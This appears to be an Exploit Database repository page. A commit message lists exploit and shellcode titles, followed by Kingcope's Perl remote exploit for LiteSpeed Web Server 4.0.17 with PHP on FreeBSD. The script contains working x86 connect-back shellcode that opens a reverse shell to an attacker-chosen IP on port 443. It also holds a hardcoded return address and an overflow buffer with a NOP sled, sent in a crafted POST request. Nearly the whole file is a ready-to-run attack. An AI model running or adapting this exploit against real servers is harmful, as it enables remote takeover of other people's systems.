880bbe402e
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
97 lines
No EOL
3.4 KiB
Raku
Executable file
97 lines
No EOL
3.4 KiB
Raku
Executable file
# LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD
|
|
# bug discovered & exploited by Kingcope
|
|
#
|
|
# Dec 2010
|
|
# Lame Xploit Tested with success on
|
|
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
|
|
# FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
|
|
# FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86
|
|
# can be used against the admin interface (port 7080), too
|
|
# Xploit only works on default lsphp binary not the compiled version
|
|
#
|
|
# this should be exploitable on linux too (on the compiled SAPI version)
|
|
# the shipped linux version of lsphp has stack cookies enabled,
|
|
# which could be brute forced if there wasn't a null put at the end of
|
|
# the exploit buffer. The compiled SAPI version is exploitable, but then
|
|
# the offsets differ from box to box, so this time FreeBSD targets only.
|
|
# thus on linux this is very tricky to exploit.
|
|
# this is a proof of concept, don't try this on real boxes
|
|
# see lsapilib.c line 1240
|
|
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)
|
|
|
|
use IO::Socket;
|
|
|
|
$|=1;
|
|
|
|
#freebsd reverse shell port 443
|
|
#setup a netcat on this port ^^
|
|
$bsdcbsc =
|
|
# setreuid, no root here
|
|
"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
|
|
# connect back :>
|
|
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
|
|
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
|
|
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
|
|
"\x41\x41\x41\x41\x66\x68\x01\xbb".
|
|
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
|
|
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
|
|
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
|
|
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
|
|
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
|
|
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
|
|
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
|
|
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
|
|
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
|
|
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
|
|
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
|
|
"\xb0\x01\xcd\x80";
|
|
|
|
sub usage() {
|
|
print "written by kingcope\n";
|
|
print "usage:\n".
|
|
"litespeed-remote.pl <target ip/host> <target port>
|
|
<your ip> <php file on remote host>\n\n".
|
|
"example:\n".
|
|
"perl litespeed-remote.pl 192.168.2.3 8088
|
|
192.168.2.2 phpinfo.php\n\n";
|
|
|
|
exit;
|
|
}
|
|
|
|
if ($#ARGV ne 3) { usage; }
|
|
|
|
$target = $ARGV[0];
|
|
$port = $ARGV[1];
|
|
$cbip = $ARGV[2];
|
|
$file = $ARGV[3];
|
|
|
|
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
|
|
|
|
substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);
|
|
|
|
#my $sock = IO::Socket::INET->new(PeerAddr => $target,
|
|
# PeerPort => 8088,
|
|
# Proto => 'tcp');
|
|
#$a = "A" x 500;
|
|
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";
|
|
|
|
#$x = <stdin>;
|
|
|
|
#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
|
|
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
|
|
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp
|
|
|
|
my $sock = IO::Socket::INET->new(PeerAddr => $target,
|
|
PeerPort => $port,
|
|
Proto => 'tcp');
|
|
|
|
|
|
$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
|
|
$sc = "\x90" x 3000 . $bsdcbsc;
|
|
|
|
print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/../$file?
|
|
HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";
|
|
|
|
while (<$sock>) {
|
|
print;
|
|
} |